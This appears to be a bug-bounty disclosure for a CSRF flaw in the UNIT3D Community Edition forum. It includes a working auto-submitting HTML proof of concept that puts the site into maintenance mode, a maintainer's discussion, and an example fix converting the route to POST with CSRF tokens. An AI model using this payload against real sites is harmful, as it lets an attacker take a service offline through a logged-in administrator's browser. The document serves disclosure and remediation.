Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition

Valid

Reported on

Sep 23rd 2021
Description

An attacker is able to disable the forum.

Proof of Concept

While logged in, open this POC.html in a browser. It puts the website into maintenance mode.

<html>
<body>
<!-- rewrites the displayed URL to "/" while the page loads -->
<script>history.pushState('', '', '/')</script>
<!-- no method attribute, so the form submits a GET; the browser attaches the victim's session cookie to it -->
<form action="https://unit3d.site/dashboard/commands/maintance-enable">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit(); // submits automatically on load, no click required
</script>
</body>
</html>

Impact

This vulnerability is capable of disabling the website.

Occurrences

We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back a month ago
hexdubbers modified their report
a month ago
HDVinnie
a month ago

@hexdubbers this route is protected. While the POC works it only works if you are logged in as a user in the owner group. Hence why it works on the demo site using the demo owner login credentials. https://github.com/HDInnovations/UNIT3D-Community-Edition/blob/9d49c536d00a259740b814a5b37af02ceff6c617/app/Http/Controllers/Staff/CommandController.php#L42

However, I do still agree it should be a POST request with a CSRF token and not a GET.

I'm just not sure this disclosure is proper as is.
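The fix HDVinnie describes (POST plus CSRF token) as a before/after route definition. This is an added example, not the project's routes/web.php or the commit referenced in the thread; the controller method name maintanceEnable and the owner middleware alias are assumptions, the URI is the one from the PoC.

```php
<?php
// routes/web.php excerpt (added example; method and middleware names assumed)

use App\Http\Controllers\Staff\CommandController;
use Illuminate\Support\Facades\Route;

// BEFORE: a state-changing action on a GET route. The browser attaches the
// owner's session cookie to a cross-site <form> or <img> request, and
// Laravel's VerifyCsrfToken middleware skips GET/HEAD/OPTIONS entirely, so
// the auth/group check passes and the action runs.
Route::get('dashboard/commands/maintance-enable', [CommandController::class, 'maintanceEnable'])
    ->middleware(['auth', 'owner'])   // 'owner' is an assumed middleware alias
    ->name('staff.commands.maintance_enable');

// AFTER: POST only. Inside the 'web' middleware group VerifyCsrfToken now
// requires a token matching the one stored in the victim's session
// (hash_equals on the '_token' field or the X-CSRF-TOKEN header). A forged
// cross-site form cannot read that token, so the request fails with 419.
Route::post('dashboard/commands/maintance-enable', [CommandController::class, 'maintanceEnable'])
    ->middleware(['auth', 'owner'])
    ->name('staff.commands.maintance_enable');

// The legitimate staff view must now send the token. Blade equivalent:
//   <form method="POST" action="{{ route('staff.commands.maintance_enable') }}">
//       @csrf   {{-- renders <input type="hidden" name="_token" value="..."> --}}
//       <button type="submit">Enable maintenance mode</button>
//   </form>
```

The same audit applies to every other command under dashboard/commands: any route that changes state but accepts GET bypasses the CSRF middleware regardless of how strict its authorization check is.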

HDVinnie validated this vulnerability a month ago
hexdubbers has been awarded the disclosure bounty
The fix bounty is now up for grabs
HDVinnie confirmed that a fix has been merged on bde1c7 a month ago
HDVinnie has been awarded the fix bounty
web.php#L736 has been validated
hexdubbers
a month ago

Researcher
@HDVinnie hey, thanks for the bounty! I read your comment and I'm curious what the difference is between this report and this one that you reported: "https://huntr.dev/bounties/2a6fc0f8-44c0-4ecd-85f7-188e21e5f42d/". If an attacker sent an admin my POC and they clicked on it, then the forum would be disabled. Please let me know if I am wrong, since that is my understanding.